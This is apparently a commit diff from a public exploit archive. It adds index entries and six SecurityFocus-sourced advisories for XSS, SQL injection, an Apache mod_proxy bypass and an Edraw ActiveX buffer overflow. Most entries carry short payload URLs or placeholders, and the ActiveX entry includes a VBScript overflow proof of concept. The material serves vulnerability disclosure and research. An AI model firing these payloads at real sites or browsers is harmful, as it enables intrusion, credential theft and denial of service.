DB: 2015-04-08

6 new exploits

files.csv

@@ -33063,3 +33063,9 @@ id,file,description,date,author,platform,type,port
 36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 'server_id' Parameter Cross Site Scripting Vulnerabilities",2012-02-01,andsarmiento,php,webapps,0
 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 Multiple Cross Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0
 36657,platforms/php/webapps/36657.txt,"Joomla! 'com_bnf' Component 'seccion_id' Parameter Remote SQL Injection Vulnerability",2012-02-02,"Daniel Godoy",php,webapps,0
+36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module Cross Site Scripting Vulnerability",2012-02-02,"Red Security TEAM",php,webapps,0
+36659,platforms/php/webapps/36659.txt,"Joomla! Currency Converter Component 'from' Parameter Cross-Site Scripting Vulnerability",2012-02-02,"BHG Security Center",php,webapps,0
+36660,platforms/php/webapps/36660.txt,"project-open 3.4.x 'account-closed.tcl' Cross Site Scripting Vulnerability",2012-02-03,"Michail Poultsakis",php,webapps,0
+36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 'weblink_id' Parameter SQL Injection Vulnerability",2012-02-03,Am!r,php,webapps,0
+36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 ActiveX Control 'LicenseName()' Method Buffer Overflow Vulnerability",2012-02-06,"Senator of Pirates",windows,dos,0
+36663,platforms/linux/remote/36663.txt,"Apache HTTP Server <= 2.2.15 'mod_proxy' Reverse Proxy Security Bypass Vulnerability",2012-02-06,"Tomas Hoger",linux,remote,0

platforms/linux/remote/36663.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/51869/info
+
+Apache HTTP Server is prone to a security-bypass vulnerability.
+
+Successful exploits will allow attackers to bypass certain security restrictions and obtain sensitive information about running web applications. 
+
+RewriteRule ^(.*) http://www.example.com$1
+ProxyPassMatch ^(.*) http://www.example.com$1 

platforms/php/webapps/36658.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51803/info
+
+iknSupport is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/module/kb/search_word/" onmouseover=alert(1) bad=/"/Submit/Search/task/search 

platforms/php/webapps/36659.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51804/info
+
+The Currency Converter component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS] 

platforms/php/webapps/36660.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51842/info
+
+project-open is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/register/account-closed?message=[arbitrary-JavaScript] 

platforms/php/webapps/36661.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51865/info
+
+PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/weblinks.php?weblink_id=[Sql] 

platforms/windows/dos/36662.txt

@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/51866/info
+
+Edraw Diagram Component ActiveX control ('EDBoard.ocx') is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the application, usually Internet Explorer, using the ActiveX control. Failed attacks will likely cause denial-of-service conditions.
+
+Edraw Diagram Component 5 is vulnerable; other versions may also be affected. 
+
+Author : Senator of Pirates
+This exploit tested on Windows Xp SP3 EN
+http://www.edrawsoft.com/download/EDBoardSetup.exe
+--------------------------------------------------------------------------------------------------------
+<object
+classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' /> <script language='vbscript'>targetFile = "C:\Program Files\edboard\EDBoard.ocx"
+prototype  = "Invoke_Unknown LicenseName As String"
+memberName = "LicenseName"
+progid     = "EDBoardLib.EDBoard"
+argCount   = 1
+arg1=String(3092, "A")
+target.LicenseName = arg1</script>

platforms/windows/local/36533.py

@@ -4,7 +4,7 @@
 #[+] Date: 27-03-2015
 #[+] Type: Local Exploits
 #[+] Tested on: WinXp/Windows 7 Pro
-#[+] Vendor: https://www.internetdownloadmanager.com/
+#[+] Vendor: http://www.internetdownloadmanager.com/
 #[+] Friendly Sites: sec4ever.com
 #[+] Twitter: @TCYB3R
 #[+] Poc:http://i.imgur.com/7et4xSh.png